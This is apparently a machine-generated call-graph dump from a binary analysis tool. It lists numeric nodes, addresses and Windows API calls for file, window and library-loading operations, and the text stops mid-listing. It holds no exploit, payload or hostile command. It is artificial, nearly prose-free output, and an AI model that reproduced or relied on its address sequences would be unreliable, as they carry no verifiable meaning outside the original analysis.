55867->55868 55869 448562 55868->55869 55870 4037b8 18 API calls 55869->55870 55871 448574 55870->55871 55872 403778 18 API calls 55871->55872 55873 448595 55872->55873 55874 4037b8 18 API calls 55873->55874 55875 4485ad 55874->55875 55876 403778 18 API calls 55875->55876 55877 4485d8 55876->55877 55878 4037b8 18 API calls 55877->55878 55887 4485f0 55878->55887 55879 448628 55881 403420 4 API calls 55879->55881 55880 4486c3 55885 4486cb GetProcAddress 55880->55885 55882 448708 55881->55882 55882->55859 55883 44864b LoadLibraryExA 55883->55887 55884 44865d LoadLibraryA 55884->55887 55886 4486de 55885->55886 55886->55879 55887->55879 55887->55880 55887->55883 55887->55884 55888 403b80 18 API calls 55887->55888 55889 403450 18 API calls 55887->55889 55891 43da88 18 API calls 55887->55891 55888->55887 55889->55887 55891->55887 50277 416644 50278 416651 50277->50278 50279 4166ab 50277->50279 50284 416550 CreateWindowExA 50278->50284 50280 416658 SetPropA SetPropA 50280->50279 50281 41668b 50280->50281 50282 41669e SetWindowPos 50281->50282 50282->50279 50284->50280 55892 4222e4 55893 4222f3 55892->55893 55898 421274 55893->55898 55896 422313 55899 4212e3 55898->55899 55912 421283 55898->55912 55902 4212f4 55899->55902 55923 4124d0 GetMenuItemCount GetMenuStringA GetMenuState 55899->55923 55901 421322 55904 421395 55901->55904 55909 42133d 55901->55909 55902->55901 55903 4213ba 55902->55903 55906 4213ce SetMenu 55903->55906 55920 421393 55903->55920 55911 4213a9 55904->55911 55904->55920 55905 4213e6 55926 4211bc 24 API calls 55905->55926 55906->55920 55915 421360 GetMenu 55909->55915 55909->55920 55910 4213ed 55910->55896 55921 4221e8 10 API calls 55910->55921 55914 4213b2 SetMenu 55911->55914 55912->55899 55922 408d2c 33 API calls 55912->55922 55914->55920 55916 421383 55915->55916 55917 42136a 55915->55917 55924 4124d0 GetMenuItemCount GetMenuStringA GetMenuState 55916->55924 55919 42137d SetMenu 55917->55919 55919->55916 55920->55905 55925 421e2c 25 API calls 55920->55925 55921->55896 55922->55912 55923->55902 55924->55920 55925->55905 55926->55910 55927 44b4a8 55928 44b4b6 55927->55928 55930 44b4d5 55927->55930 55929 44b38c 25 API calls 55928->55929 55928->55930 55929->55930 55931 448728 55932 448756 55931->55932 55933 44875d 55931->55933 55935 403400 4 API calls 55932->55935 55934 448771 55933->55934 55936 44852c 21 API calls 55933->55936 55934->55932 55937 403494 4 API calls 55934->55937 55938 448907 55935->55938 55936->55934 55939 44878a 55937->55939 55940 4037b8 18 API calls 55939->55940 55941 4487a6 55940->55941 55942 4037b8 18 API calls 55941->55942 55943 4487c2 55942->55943 55943->55932 55944 4487d6 55943->55944 55945 4037b8 18 API calls 55944->55945 55946 4487f0 55945->55946 55947 431bd0 18 API calls 55946->55947 55948 448812 55947->55948 55949 431ca0 18 API calls 55948->55949 55956 448832 55948->55956 55949->55948 55950 448888 55963 442334 55950->55963 55951 448870 55951->55950 55975 4435d0 18 API calls 55951->55975 55955 4488bc GetLastError 55976 4484c0 18 API calls 55955->55976 55956->55951 55974 4435d0 18 API calls 55956->55974 55958 4488cb 55977 443610 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55958->55977 55960 4488e0 55978 443620 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55960->55978 55962 4488e8 55964 443312 55963->55964 55965 44236d 55963->55965 55967 403400 4 API calls 55964->55967 55966 403400 4 API calls 55965->55966 55968 442375 55966->55968 55969 443327 55967->55969 55970 431bd0 18 API calls 55968->55970 55969->55955 55971 442381 55970->55971 55972 443302 55971->55972 55979 441a0c 18 API calls 55971->55979 55972->55955 55974->55956 55975->55950 55976->55958 55977->55960 55978->55962 55979->55971 55980 4165ec DestroyWindow 55981 42e3ef SetErrorMode 50285 441394 50286 44139d 50285->50286 50287 4413ab WriteFile 50285->50287 50286->50287 50288 4413b6 50287->50288 55982 491bf8 55983 491c32 55982->55983 55984 491c34 55983->55984 55986 491c3e 55983->55986 56178 409098 MessageBeep 55984->56178 55988 491c4d 55986->55988 55989 491c76 55986->55989 55987 491c39 55990 403420 4 API calls 55987->55990 55991 446ff8 32 API calls 55988->55991 55994 491cae 55989->55994 55995 491c85 55989->55995 55992 49228a 55990->55992 55993 491c5a 55991->55993 55996 403400 4 API calls 55992->55996 56179 406bb0 55993->56179 56004 491cbd 55994->56004 56005 491ce6 55994->56005 55998 446ff8 32 API calls 55995->55998 55999 492292 55996->55999 56001 491c92 55998->56001 56187 406c00 18 API calls 56001->56187 56007 446ff8 32 API calls 56004->56007 56011 491d0e 56005->56011 56012 491cf5 56005->56012 56006 491c9d 56188 44734c 19 API calls 56006->56188 56009 491cca 56007->56009 56189 406c34 18 API calls 56009->56189 56018 491d1d 56011->56018 56019 491d42 56011->56019 56191 407280 19 API calls 56012->56191 56013 491cd5 56190 44734c 19 API calls 56013->56190 56016 491cfd 56192 44734c 19 API calls 56016->56192 56020 446ff8 32 API calls 56018->56020 56023 491d7a 56019->56023 56024 491d51 56019->56024 56021 491d2a 56020->56021 56022 4072a8 SetCurrentDirectoryA 56021->56022 56025 491d32 56022->56025 56029 491d89 56023->56029 56030 491db2 56023->56030 56026 446ff8 32 API calls 56024->56026 56193 4470d0 19 API calls 56025->56193 56028 491d5e 56026->56028 56031 42c804 19 API calls 56028->56031 56032 446ff8 32 API calls 56029->56032 56037 491dfe 56030->56037 56038 491dc1 56030->56038 56033 491d69 56031->56033 56034 491d96 56032->56034 56194 44734c 19 API calls 56033->56194 56195 4071f8 22 API calls 56034->56195 56044 491e0d 56037->56044 56045 491e36 56037->56045 56040 446ff8 32 API calls 56038->56040 56039 491da1 56196 44734c 19 API calls 56039->56196 56042 491dd0 56040->56042 56043 446ff8 32 API calls 56042->56043 56046 491de1 56043->56046 56047 446ff8 32 API calls 56044->56047 56051 491e6e 56045->56051 56052 491e45 56045->56052 56197 4918fc 22 API calls 56046->56197 56049 491e1a 56047->56049 56053 42c8a4 19 API calls 56049->56053 56050 491ded 56198 44734c 19 API calls 56050->56198 56060 491e7d 56051->56060 56061 491ea6 56051->56061 56055 446ff8 32 API calls 56052->56055 56056 491e25 56053->56056 56057 491e52 56055->56057 56199 44734c 19 API calls 56056->56199 56059 42c8cc 19 API calls 56057->56059 56062 491e5d 56059->56062 56063 446ff8 32 API calls 56060->56063 56067 491ede 56061->56067 56068 491eb5 56061->56068 56200 44734c 19 API calls 56062->56200 56065 491e8a 56063->56065 56201 42c8fc 19 API calls 56065->56201 56073 491eed 56067->56073 56074 491f16 56067->56074 56070 446ff8 32 API calls 56068->56070 56069 491e95 56202 44734c 19 API calls 56069->56202 56072 491ec2 56070->56072 56075 42c92c 19 API calls 56072->56075 56076 446ff8 32 API calls 56073->56076 56081 491f62 56074->56081 56082 491f25 56074->56082 56077 491ecd 56075->56077 56078 491efa 56076->56078 56203 44734c 19 API calls 56077->56203 56080 42c954 19 API calls 56078->56080 56083 491f05 56080->56083 56087 491f71 56081->56087 56088 491fb4 56081->56088 56084 446ff8 32 API calls 56082->56084 56204 44734c 19 API calls 56083->56204 56086 491f34 56084->56086 56089 446ff8 32 API calls 56086->56089 56090 446ff8 32 API calls 56087->56090 56095 491fc3 56088->56095 56096 492027 56088->56096 56091 491f45 56089->56091 56093 491f84 56090->56093 56205 42c4f8 19 API calls 56091->56205 56097 446ff8 32 API calls 56093->56097 56094 491f51 56206 44734c 19 API calls 56094->56206 56099 446ff8 32 API calls 56095->56099 56103 492066 56096->56103 56104 492036 56096->56104 56100 491f95 56097->56100 56101 491fd0 56099->56101 56207 491af4 26 API calls 56100->56207 56170 42c608 21 API calls 56101->56170 56116 4920a5 56103->56116 56117 492075 56103->56117 56107 446ff8 32 API calls 56104->56107 56106 491fa3 56208 44734c 19 API calls 56106->56208 56110 492043 56107->56110 56108 491fde 56111 491fe2 56108->56111 56112 492017 56108->56112 56211 452908 Wow64DisableWow64FsRedirection SetLastError Wow64RevertWow64FsRedirection DeleteFileA GetLastError 56110->56211 56115 446ff8 32 API calls 56111->56115 56210 4470d0 19 API calls 56112->56210 56120 491ff1 56115->56120 56125 4920e4 56116->56125 56126 4920b4 56116->56126 56118 446ff8 32 API calls 56117->56118 56121 492082 56118->56121 56119 492050 56212 4470d0 19 API calls 56119->56212 56171 452c80 56120->56171 56124 452770 5 API calls 56121->56124 56129 49208f 56124->56129 56134 49212c 56125->56134 56135 4920f3 56125->56135 56130 446ff8 32 API calls 56126->56130 56127 492061 56127->55987 56128 492001 56209 4470d0 19 API calls 56128->56209 56213 4470d0 19 API calls 56129->56213 56133 4920c1 56130->56133 56214 452e10 Wow64DisableWow64FsRedirection SetLastError Wow64RevertWow64FsRedirection RemoveDirectoryA GetLastError 56133->56214 56142 49213b 56134->56142 56143 492174 56134->56143 56137 446ff8 32 API calls 56135->56137 56139 492102 56137->56139 56138 4920ce 56215 4470d0 19 API calls 56138->56215 56141 446ff8 32 API calls 56139->56141 56145 492113 56141->56145 56144 446ff8 32 API calls 56142->56144 56148 492187 56143->56148 56154 49223d 56143->56154 56146 49214a 56144->56146 56150 447278 19 API calls 56145->56150 56147 446ff8 32 API calls 56146->56147 56149 49215b 56147->56149 56151 446ff8 32 API calls 56148->56151 56156 447278 19 API calls 56149->56156 56150->55987 56152 4921b4 56151->56152 56153 446ff8 32 API calls 56152->56153 56157 4921cb 56153->56157 56154->55987 56219 446f9c 32 API calls 56154->56219 56156->55987 56216 407ddc 21 API calls 56157->56216 56158 492256 56159 42e8c8 19 API calls 56158->56159 56160 49225e 56159->56160 56220 44734c 19 API calls 56160->56220 56163 4921ed 56164 446ff8 32 API calls 56163->56164 56165 492201 56164->56165 56217 408508 18 API calls 56165->56217 56167 49220c 56218 44734c 19 API calls 56167->56218 56169 492218 56170->56108 56172 452724 2 API calls 56171->56172 56174 452c99 56172->56174 56173 452c9d 56173->56128 56174->56173 56175 452cc1 MoveFileA GetLastError 56174->56175 56176 452760 Wow64RevertWow64FsRedirection 56175->56176 56177 452ce7 56176->56177 56177->56128 56178->55987 56180 406bbf 56179->56180 56181 406be1 56180->56181 56182 406bd8 56180->56182 56184 403778 18 API calls 56181->56184 56183 403400 4 API calls 56182->56183 56185 406bdf 56183->56185 56184->56185 56186 44734c 19 API calls 56185->56186 56186->55987 56187->56006 56188->55987 56189->56013 56190->55987 56191->56016 56192->55987 56193->55987 56194->55987 56195->56039 56196->55987 56197->56050 56198->55987 56199->55987 56200->55987 56201->56069 56202->55987 56203->55987 56204->55987 56205->56094 56206->55987 56207->56106 56208->55987 56209->55987 56210->55987 56211->56119 56212->56127 56213->55987 56214->56138 56215->55987 56216->56163 56217->56167 56218->56169 56219->56158 56220->55987 56221 40cc34 56224 406f10 WriteFile 56221->56224 56225 406f2d 56224->56225 50289 48095d 50294 451004 50289->50294 50291 480971 50304 47fa0c 50291->50304 50293 480995 50295 451011 50294->50295 50297 451065 50295->50297 50313 408c0c 18 API calls 50295->50313 50310 450e88 50297->50310 50301 45108d 50302 4510d0 50301->50302 50315 408c0c 18 API calls 50301->50315 50302->50291 50320 40b3c8 50304->50320 50306 47fa79 50306->50293 50308 47fa2e 50308->50306 50324 4069dc 50308->50324 50327 476994 50308->50327 50316 450e34 50310->50316 50313->50297 50314 408c0c 18 API calls 50314->50301 50315->50302 50317 450e57 50316->50317 50318 450e46 50316->50318 50317->50301 50317->50314 50319 450e4b InterlockedExchange 50318->50319 50319->50317 50321 40b3d3 50320->50321 50323 40b3f3 50321->50323 50343 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50321->50343 50323->50308 50325 402648 18 API calls 50324->50325 50326 4069e7 50325->50326 50326->50308 50336 4769c5 50327->50336 50342 476a0e 50327->50342 50328 451294 35 API calls 50328->50336 50329 476a59 50344 451294 50329->50344 50330 451294 35 API calls 50330->50342 50333 476a70 50335 403420 4 API calls 50333->50335 50334 4038a4 18 API calls 50334->50342 50337 476a8a 50335->50337 50336->50328 50336->50342 50350 4038a4 50336->50350 50359 403744 50336->50359 50363 403450 50336->50363 50337->50308 50340 403744 18 API calls 50340->50342 50341 403450 18 API calls 50341->50342 50342->50329 50342->50330 50342->50334 50342->50340 50342->50341 50343->50323 50345 4512a4 50344->50345 50346 4512af 50344->50346 50345->50333 50369 451238 35 API calls 50346->50369 50348 4512ba 50348->50345 50370 408c0c 18 API calls 50348->50370 50351 4038b1 50350->50351 50358 4038e1 50350->50358 50353 4038da 50351->50353 50356 4038bd 50351->50356 50352 403400 4 API calls 50355 4038cb 50352->50355 50354 4034bc 18 API calls 50353->50354 50354->50358 50355->50336 50371 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50356->50371 50358->50352 50360 40374a 50359->50360 50362 40375b 50359->50362 50361 4034bc 18 API calls 50360->50361 50360->50362 50361->50362 50362->50336 50365 403454 50363->50365 50367 403464 50363->50367 50364 403490 50364->50336 50366 4034bc 18 API calls 50365->50366 50365->50367 50366->50367 50367->50364 50368 402660 4 API calls 50367->50368 50368->50364 50369->50348 50370->50345 50371->50355 50372 41ee54 50373 41ee63 IsWindowVisible 50372->50373 50374 41ee99 50372->50374 50373->50374 50375 41ee6d IsWindowEnabled 50373->50375 50375->50374 50376 41ee77 50375->50376 50377 402648 18 API calls 50376->50377 50378 41ee81 EnableWindow 50377->50378 50378->50374 50379 46bb10 50380 46bb44 50379->50380 50412 46bfad 50379->50412 50382 46bb80 50380->50382 50385 46bbdc 50380->50385 50386 46bbba 50380->50386 50387 46bbcb 50380->50387 50388 46bb98 50380->50388 50389 46bba9 50380->50389 50381 403400 4 API calls 50384 46bfec 50381->50384 50382->50412 50470 468c74 50382->50470 50390 403400 4 API calls 50384->50390 50702 46baa0 59 API calls 50385->50702 50435 46b6d0 50386->50435 50701 46b890 81 API calls 50387->50701 50699 46b420 61 API calls 50388->50699 50700 46b588 56 API calls 50389->50700 50396 46bff4 50390->50396 50397 46bb9e 50397->50382 50397->50412 50398 46bc5b 50402 414ae8 18 API calls 50398->50402 50403 46bd7e 50398->50403 50406 42cbc0 20 API calls 50398->50406 50408 403450 18 API calls 50398->50408 50409 46af68 37 API calls 50398->50409 50398->50412 50413 46bdd7 50398->50413 50431 46be9f 50398->50431 50473 468bb0 50398->50473 50481 46acd4 50398->50481 50626 483084 50398->50626 50739 46b1dc 33 API calls 50398->50739 50399 46bc18 50399->50398 50399->50412 50703 494da0 50399->50703 50402->50398 50722 48358c 137 API calls 50403->50722 50406->50398 50407 46bd99 50407->50412 50408->50398 50409->50398 50412->50381 50488 469f1c 50413->50488 50414 46af68 37 API calls 50414->50412 50416 46be3d 50417 403450 18 API calls 50416->50417 50418 46be4d 50417->50418 50419 46bea9 50418->50419 50420 46be59 50418->50420 50425 46bf6b 50419->50425 50549 46af68 50419->50549 50723 457f1c 50420->50723 50424 457f1c 38 API calls 50424->50431 50431->50414 50740 46c424 50435->50740 50438 46b852 50439 403420 4 API calls 50438->50439 50441 46b86c 50439->50441 50443 403400 4 API calls 50441->50443 50442 46b71e 50469 46b83e 50442->50469 50747 455f84 27 API calls 50442->50747 50445 46b874 50443->50445 50444 403450 18 API calls 50444->50438 50447 403400 4 API calls 50445->50447 50448 46b87c 50447->50448 50448->50382 50449 46b801 50449->50438 50455 42cd48 21 API calls 50449->50455 50449->50469 50452 46b73c 50453 46b7a1 50452->50453 50748 466600 50452->50748 50453->50438 50453->50449 50757 42cd48 50453->50757 50458 46b817 50455->50458 50463 451458 18 API calls 50458->50463 50458->50469 50460 466600 33 API calls 50462 46b77c 50460->50462 50465 46b82e 50463->50465 50764 47efd0 56 API calls 50465->50764 50469->50438 50469->50444 50471 468bb0 33 API calls 50470->50471 50472 468c83 50471->50472 50472->50399 50477 468bdf 50473->50477 50474 4078f4 33 API calls 50475 468c18 50474->50475 51018 453344 18 API calls 50475->51018 50477->50474 50478 468c20 50477->50478 50479 403400 4 API calls 50478->50479 50480 468c38 50479->50480 50480->50398 50482 46ace5 50481->50482 50483 46ace0 50481->50483 51104 469a80 60 API calls 50482->51104 50484 46ace3 50483->50484 51019 46a740 50483->51019 50484->50398 50486 46aced 50486->50398 50489 403400 4 API calls 50488->50489 50490 469f4a 50489->50490 51481 47dd00 50490->51481 50492 469fad 50493 469fb1 50492->50493 50494 469fca 50492->50494 51488 466800 50493->51488 50496 469fbb 50494->50496 51491 494c90 18 API calls 50494->51491 50497 46a25e 50496->50497 50499 46a154 50496->50499 50500 46a0e9 50496->50500 50501 403420 4 API calls 50497->50501 50505 403494 4 API calls 50499->50505 50504 403494 4 API calls 50500->50504 50506 46a288 50501->50506 50502 469fe6 50502->50496 50503 469fee 50502->50503 50507 46af68 37 API calls 50503->50507 50508 46a0f6 50504->50508 50509 46a161 50505->50509 50506->50416 50516 469ffb 50507->50516 50510 40357c 18 API calls 50508->50510 50511 40357c 18 API calls 50509->50511 50512 46a103 50510->50512 50513 46a16e 50511->50513 50514 40357c 18 API calls 50512->50514 50515 40357c 18 API calls 50513->50515 50517 46a110 50514->50517 50518 46a17b 50515->50518 50521 46a024 SetActiveWindow 50516->50521 50522 46a03c 50516->50522 50519 40357c 18 API calls 50517->50519 50520 40357c 18 API calls 50518->50520 50523 46a11d 50519->50523 50524 46a188 50520->50524 50521->50522 51492 42f560 50522->51492 50526 466800 34 API calls 50523->50526 50525 40357c 18 API calls 50524->50525 50528 46a196 50525->50528 50527 46a12b 50526->50527 50529 40357c 18 API calls 50527->50529 50530 414b18 18 API calls 50528->50530 50532 46a134 50529->50532 50533 46a152 50530->50533 50535 40357c 18 API calls 50532->50535 51509 466b38 50533->51509 50538 46a141 50535->50538 50540 414b18 18 API calls 50538->50540 50539 46a08d 50541 46ade4 35 API calls 50539->50541 50540->50533 50542 46a0bf 50541->50542 50542->50416 50550 468c74 33 API calls 50549->50550 50551 46af80 50550->50551 50552 46afa2 50551->50552 50553 4652cc 21 API calls 50551->50553 51705 4652cc 50552->51705 50553->50552 50557 46afba 50558 46ade4 35 API calls 50557->50558 50559 46aff2 50558->50559 50560 414b18 18 API calls 50559->50560 50561 46b006 50560->50561 50562 46b012 50561->50562 50563 46b03c 50561->50563 50564 414b18 18 API calls 50562->50564 50565 46b05b 50563->50565 50566 46b085 50563->50566 50567 46b026 50564->50567 50568 414b18 18 API calls 50565->50568 50569 414b18 18 API calls 50566->50569 50570 414b18 18 API calls 50567->50570 50571 46b06f 50568->50571 50572 46b099 50569->50572 50573 46b03a 50570->50573 50574 414b18 18 API calls 50571->50574 50575 414b18 18 API calls 50572->50575 51722 46acfc 50573->51722 50574->50573 50575->50573 50627 46c424 62 API calls 50626->50627 50628 4830c7 50627->50628 50629 4830d0 50628->50629 51992 408be0 19 API calls 50628->51992 50631 414ae8 18 API calls 50629->50631 50632 4830e0 50631->50632 50633 403450 18 API calls 50632->50633 50634 4830ed 50633->50634 51794 46c77c 50634->51794 50637 4830fd 50639 414ae8 18 API calls 50637->50639 50640 48310d 50639->50640 50641 403450 18 API calls 50640->50641 50642 48311a 50641->50642 50643 469868 SendMessageA 50642->50643 50644 483133 50643->50644 50645 483184 50644->50645 51994 479e18 37 API calls 50644->51994 51823 4241dc IsIconic 50645->51823 50649 48319f SetActiveWindow 50650 4831b4 50649->50650 51831 4824b4 50650->51831 50699->50397 50700->50382 50701->50382 50702->50382 53655 43d9c8 50703->53655 50706 494dcc 53660 431bd0 50706->53660 50707 494e52 50708 494e61 50707->50708 53693 4945c8 18 API calls 50707->53693 50708->50398 50717 494e16 53691 49465c 18 API calls 50717->53691 50719 494e2a 53692 433dd0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50719->53692 50721 494e4a 50721->50398 50722->50407 50724 457f41 50723->50724 50725 457f61 50724->50725 50726 4078f4 33 API calls 50724->50726 50728 403400 4 API calls 50725->50728 50727 457f59 50726->50727 50729 457d10 38 API calls 50727->50729 50730 457f76 50728->50730 50729->50725 50730->50424 50739->50398 50765 46c4bc 50740->50765 50743 414ae8 50744 414af6 50743->50744 50745 4034e0 18 API calls 50744->50745 50746 414b03 50745->50746 50746->50442 50747->50452 50749 46661a 50748->50749 50969 4078f4 50749->50969 51012 42cccc 50757->51012 50760 451458 50761 451428 18 API calls 50760->50761 50762 451474 50761->50762 50763 47efd0 56 API calls 50762->50763 50763->50449 50764->50469 50766 414ae8 18 API calls 50765->50766 50767 46c4f0 50766->50767 50826 466898 50767->50826 50771 46c502 50772 46c511 50771->50772 50776 46c52a 50771->50776 50896 47efd0 56 API calls 50772->50896 50774 403420 4 API calls 50775 46b702 50774->50775 50775->50438 50775->50743 50777 46c571 50776->50777 50778 46c558 50776->50778 50779 46c5d6 50777->50779 50792 46c575 50777->50792 50897 47efd0 56 API calls 50778->50897 50899 42cb4c CharNextA 50779->50899 50782 46c5e5 50783 46c5e9 50782->50783 50787 46c602 50782->50787 50900 47efd0 56 API calls 50783->50900 50785 46c5bd 50898 47efd0 56 API calls 50785->50898 50786 46c626 50901 47efd0 56 API calls 50786->50901 50787->50786 50840 466a08 50787->50840 50791 46c616 50791->50786 50845 466a38 50791->50845 50792->50785 50792->50787 50795 46c63f 50849 403778 50795->50849 50800 46c666 50902 466a94 18 API calls 50800->50902 50801 46c697 50860 42c8cc 50801->50860 50804 46c679 50807 451458 18 API calls 50804->50807 50809 46c686 50807->50809 50903 47efd0 56 API calls 50809->50903 50813 46c525 50813->50774 50831 4668b2 50826->50831 50828 42cbc0 20 API calls 50828->50831 50829 403450 18 API calls 50829->50831 50830 406bb0 18 API calls 50830->50831 50831->50828 50831->50829 50831->50830 50832 4668fb 50831->50832 50906 42caac 50831->50906 50833 403420 4 API calls 50832->50833 50834 466915 50833->50834 50835 414b18 50834->50835 50836 414ae8 18 API calls 50835->50836 50837 414b3c 50836->50837 50838 403400 4 API calls 50837->50838 50839 414b6d 50838->50839 50839->50771 50843 466a12 50840->50843 50841 466a33 50841->50791 50842 466a25 50842->50791 50843->50841 50843->50842 50922 42cb3c CharNextA 50843->50922 50847 466a42 50845->50847 50846 466a6f 50846->50786 50846->50795 50847->50846 50923 42cb3c CharNextA 50847->50923 50850 4037aa 50849->50850 50852 40377d 50849->50852 50851 403400 4 API calls 50850->50851 50853 4037a0 50851->50853 50852->50850 50854 403791 50852->50854 50856 42c99c 50853->50856 50855 4034e0 18 API calls 50854->50855 50855->50853 50857 42c9f5 50856->50857 50858 42c9b2 50856->50858 50857->50800 50857->50801 50858->50857 50924 42cb3c CharNextA 50858->50924 50925 42c674 50860->50925 50896->50813 50897->50813 50898->50813 50899->50782 50900->50813 50901->50813 50902->50804 50903->50813 50907 403494 4 API calls 50906->50907 50910 42cabc 50907->50910 50908 403744 18 API calls 50908->50910 50910->50908 50913 42caf2 50910->50913 50915 42c444 IsDBCSLeadByte 50910->50915 50911 42cb36 50911->50831 50913->50911 50916 4037b8 50913->50916 50921 42c444 IsDBCSLeadByte 50913->50921 50915->50910 50917 403744 18 API calls 50916->50917 50918 4037c6 50917->50918 50919 4037fc 50918->50919 50920 4038a4 18 API calls 50918->50920 50919->50913 50920->50919 50921->50913 50922->50843 50923->50847 50924->50858 50928 42c67c 50925->50928 50931 42c68d 50928->50931 50929 42c6f1 50932 42c6ec 50929->50932 50936 42c444 IsDBCSLeadByte 50929->50936 50931->50929 50934 42c6ab 50931->50934 50934->50932 50935 42c444 IsDBCSLeadByte 50934->50935 50935->50934 50936->50932 50972 407908 50969->50972 50973 407925 50972->50973 50980 4075b8 50973->50980 50976 407951 50978 4034e0 18 API calls 50976->50978 50979 407903 50978->50979 50979->50460 50983 4075d3 50980->50983 50981 4075e5 50981->50976 50985 4069a0 19 API calls 50981->50985 50983->50981 50986 4076da 33 API calls 50983->50986 50987 4075ac LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50983->50987 50985->50976 50986->50983 50987->50983 51013 42cbc0 20 API calls 51012->51013 51014 42ccee 51013->51014 51015 42ccf6 GetFileAttributesA 51014->51015 51016 403400 4 API calls 51015->51016 51017 42cd13 51016->51017 51017->50449 51017->50760 51018->50478 51021 46a787 51019->51021 51020 46abff 51023 46ac1a 51020->51023 51024 46ac4b 51020->51024 51021->51020 51022 46a842 51021->51022 51027 403494 4 API calls 51021->51027 51026 46a863 51022->51026 51030 46a8a4 51022->51030 51028 403494 4 API calls 51023->51028 51025 403494 4 API calls 51024->51025 51029 46ac59 51025->51029 51031 403494 4 API calls 51026->51031 51032 46a7c6 51027->51032 51033 46ac28 51028->51033 51132 46915c 26 API calls 51029->51132 51034 403400 4 API calls 51030->51034 51036 46a871 51031->51036 51037 414ae8 18 API calls 51032->51037 51131 46915c 26 API calls 51033->51131 51039 46a8a2 51034->51039 51040 414ae8 18 API calls 51036->51040 51041 46a7e7 51037->51041 51062 46a988 51039->51062 51111 469868 51039->51111 51044 46a892 51040->51044 51105 403634 51041->51105 51042 46ac36 51043 403400 4 API calls 51042->51043 51047 46ac7c 51043->51047 51049 403634 18 API calls 51044->51049 51054 403400 4 API calls 51047->51054 51048 46aa10 51052 403400 4 API calls 51048->51052 51049->51039 51056 46aa0e 51052->51056 51053 46a8c4 51057 46a902 51053->51057 51058 46a8ca 51053->51058 51059 46ac84 51054->51059 51126 469ca4 57 API calls 51056->51126 51063 403400 4 API calls 51057->51063 51060 403494 4 API calls 51058->51060 51061 403420 4 API calls 51059->51061 51065 46a8d8 51060->51065 51066 46ac91 51061->51066 51062->51048 51067 46a9cf 51062->51067 51068 46a900 51063->51068 51117 47c26c 51065->51117 51066->50484 51072 403494 4 API calls 51067->51072 51120 469b5c 51068->51120 51076 46a9dd 51072->51076 51074 46aa39 51083 46aa44 51074->51083 51084 46aa9a 51074->51084 51075 46a8f0 51078 403634 18 API calls 51075->51078 51079 414ae8 18 API calls 51076->51079 51078->51068 51080 46a9fe 51079->51080 51082 403634 18 API calls 51080->51082 51081 46a929 51087 46a934 51081->51087 51088 46a98a 51081->51088 51082->51056 51086 403494 4 API calls 51083->51086 51085 403400 4 API calls 51084->51085 51093 46aaa2 51085->51093 51089 46aa52 51086->51089 51091 403494 4 API calls 51087->51091 51090 403400 4 API calls 51088->51090 51089->51093 51097 403634 18 API calls 51089->51097 51098 46aa98 51089->51098 51090->51062 51092 46a942 51091->51092 51092->51062 51099 403634 18 API calls 51092->51099 51103 46ab4b 51093->51103 51127 494c90 18 API calls 51093->51127 51095 46aac5 51095->51103 51128 494f3c 32 API calls 51095->51128 51097->51089 51098->51093 51099->51092 51101 46abec 51130 429144 SendMessageA SendMessageA 51101->51130 51129 4290f4 SendMessageA 51103->51129 51104->50486 51106 40363c 51105->51106 51107 4034bc 18 API calls 51106->51107 51108 40364f 51107->51108 51109 403450 18 API calls 51108->51109 51110 403677 51109->51110 51133 42a040 SendMessageA 51111->51133 51113 469877 51114 469897 51113->51114 51134 42a040 SendMessageA 51113->51134 51114->51053 51116 469887 51116->51053 51135 47c2b4 51117->51135 51124 469b89 51120->51124 51121 469beb 51122 403400 4 API calls 51121->51122 51123 469c00 51122->51123 51123->51081 51124->51121 51480 469ae0 57 API calls 51124->51480 51126->51074 51127->51095 51128->51103 51129->51101 51130->51020 51131->51042 51132->51042 51133->51113 51134->51116 51136 403494 4 API calls 51135->51136 51143 47c2e7 51136->51143 51137 47c3f9 51138 403420 4 API calls 51137->51138 51139 47c289 51138->51139 51139->51075 51141 403778 18 API calls 51141->51143 51143->51137 51143->51141 51146 4037b8 18 API calls 51143->51146 51147 47b100 51143->51147 51391 453344 18 API calls 51143->51391 51392 403800 51143->51392 51396 42c97c CharPrevA 51143->51396 51146->51143 51148 47b152 51147->51148 51149 47b130 51147->51149 51150 47b172 51148->51150 51151 47b160 51148->51151 51149->51148 51401 47a030 33 API calls 51149->51401 51154 47b1d5 51150->51154 51155 47b180 51150->51155 51152 403494 4 API calls 51151->51152 51220 47b16d 51152->51220 51167 47b1f6 51154->51167 51168 47b1e3 51154->51168 51157 47b1af 51155->51157 51158 47b189 51155->51158 51156 403400 4 API calls 51160 47baf8 51156->51160 51159 47b1c2 51157->51159 51403 453344 18 API calls 51157->51403 51161 47b19c 51158->51161 51402 453344 18 API calls 51158->51402 51165 403494 4 API calls 51159->51165 51166 403400 4 API calls 51160->51166 51163 403494 4 API calls 51161->51163 51163->51220 51165->51220 51169 47bb00 51166->51169 51171 47b217 51167->51171 51172 47b204 51167->51172 51170 403494 4 API calls 51168->51170 51169->51143 51170->51220 51174 47b267 51171->51174 51175 47b225 51171->51175 51173 403494 4 API calls 51172->51173 51173->51220 51181 47b275 51174->51181 51182 47b288 51174->51182 51176 47b241 51175->51176 51177 47b22e 51175->51177 51179 47b254 51176->51179 51404 453344 18 API calls 51176->51404 51178 403494 4 API calls 51177->51178 51178->51220 51180 403494 4 API calls 51179->51180 51180->51220 51184 403494 4 API calls 51181->51184 51185 47b296 51182->51185 51186 47b2a9 51182->51186 51184->51220 51187 403494 4 API calls 51185->51187 51188 47b2b7 51186->51188 51189 47b2ca 51186->51189 51187->51220 51190 403494 4 API calls 51188->51190 51191 47b2eb 51189->51191 51192 47b2d8 51189->51192 51190->51220 51194 47b327 51191->51194 51195 47b2f9 51191->51195 51193 403494 4 API calls 51192->51193 51193->51220 51200 47b335 51194->51200 51201 47b364 51194->51201 51196 47b315 51195->51196 51197 47b302 51195->51197 51199 47c26c 57 API calls 51196->51199 51198 403494 4 API calls 51197->51198 51198->51220 51199->51220 51202 47b351 51200->51202 51203 47b33e 51200->51203 51206 47b372 51201->51206 51207 47b3a0 51201->51207 51205 403494 4 API calls 51202->51205 51204 403494 4 API calls 51203->51204 51204->51220 51205->51220 51208 47b38e 51206->51208 51209 47b37b 51206->51209 51212 47b3ae 51207->51212 51213 47b3dd 51207->51213 51211 47c26c 57 API calls 51208->51211 51210 403494 4 API calls 51209->51210 51210->51220 51211->51220 51214 47b3b7 51212->51214 51215 47b3ca 51212->51215 